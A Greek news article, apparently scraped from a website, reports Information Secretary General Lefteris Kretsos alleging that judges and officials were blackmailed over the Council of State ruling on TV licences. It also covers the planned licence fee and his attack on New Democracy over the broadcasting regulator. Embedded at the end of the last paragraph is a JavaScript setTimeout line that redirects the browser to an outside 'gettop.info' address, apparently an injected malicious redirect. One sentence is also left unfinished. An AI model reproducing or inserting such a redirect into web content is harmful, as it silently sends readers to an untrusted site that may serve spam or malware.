Κρέτσος: Δεν εκβιάστηκαν μόνο δικαστές για τις τηλεοπτικές άδειες

0
4

 

   Για εκβιασμό δικαστών και άλλων δημοσίων λειτουργών, αναφορικά με την υπόθεση της απόφασης του ΣτΕ που έκρινε αντισυνταγματικό τον νόμο Παππά, μίλησε ο γ.γ. Ενημέρωσης Λευτέρης Κρέτσος.

Συνεχίζοντας το μπαράζ των επιθέσεών του κατά της Δικαιοσύνης, των ΜΜΕ και της αξιωματικής αντιπολίτευσης, ο κ, Κρέτσος υποστήριξε

Σε συνέντευξή του στο δελτίο ειδήσεων του «Εpsilon», ο κ. Κρέτσος υποστήριξε ότι πως δεν ήταν μόνο οι δικαστές αυτοί που εκβιάστηκαν, αλλά και όλοι οι δημόσιοι λειτουργοί που ενεπλάκησαν στη διαδικασία και δεν παρέλειψε να σημειώσει, εκ νέου, ότι «και οι δικαστές δεν είναι υπεράνω κριτικής».

Ο γενικός γραμματέας Ενημέρωσης ανέφερε ότι η κυβέρνηση υφίσταται «επί οκτώ μήνες μιντιακή τρομοκρατία» και πρόσθεσε: «Μόνο στην κακομοίρα την ΕΡΤ έριξαν μαύρο».

Στο ερώτημα πόσα κανάλια χωρούν στο τηλεοπτικό φάσμα, ο γ.γ. Ενημέρωσης απάντησε ότι με βάση τα στοιχεία που διαθέτει η κυβέρνηση, είναι δυνατόν να εκπέμψουν «το πολύ 6-7 HD κανάλια».

Για τη ρύθμιση

Αναφερόμενος στη ρύθμιση που σκοπεύει να φέρει η κυβέρνηση ο κ. Κρέτσος είπε ότι «μέχρι να γίνει ο διαγωνισμός, αν συμφωνούν οι άλλοι ότι τα κανάλια πρέπει να εκπέμπουν δωρεάν, εμείς δεν θα το επιτρέψουμε. Ο νόμος θα προβλέπει ότι θα υπάρχει αντίτιμο για τον πρώτο χρόνο λειτουργίας, ελπίζουμε ότι θα γίνει γρήγορα ο διαγωνισμός από το ΕΣΡ και δεν θα υπάρξει 2oς χρόνος».

Αν και δεν έχει προσδιοριστεί το τίμημα, ο κ. Κρέτσος αναφέρθηκε στον διαγωνισμό που ακυρώθηκε από το ΣτΕ: «Εχουμε ένα μέτρο από το διαγωνισμό που ακυρώθηκε από το ΣτΕ. Προβλέπονταν ετήσια έσοδα για το Δημόσιο της τάξης των 25 εκατ. το χρόνο. Αυτό το ποσό είναι ένα μέτρο σύγκρισης». Πρόσθεσε, μάλιστα, πως πλέον η κυβέρνηση θα δώσει άδεια προσωρινής λειτουργίας, χωρίς όμως, να κάνει σαφή αναφορά σε πόσα κανάλια.

Επίθεση στη ΝΔ

Ο Γενικός Γραμματέας Ενημέρωσης εξαπέλυσε νέα επίθεση στην Νέα Δημοκρατία την οποία κατηγόρησε ότι δεν έχει συναινέσει στην συγκρότηση του ΕΣΡ τέσσερις φορές. Κάλεσε δε την αξιωματική αντιπολίτευση να προσέλθει στην επόμενη Διάσκεψη των Προέδρων, που προγραμματιστεί για την Δευτέρα, ώστε να συσταθεί το ΕΣΡ, για να προχωρήσει η διαδικασία αδειοδότησης των τηλεοπτικών σταθμών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here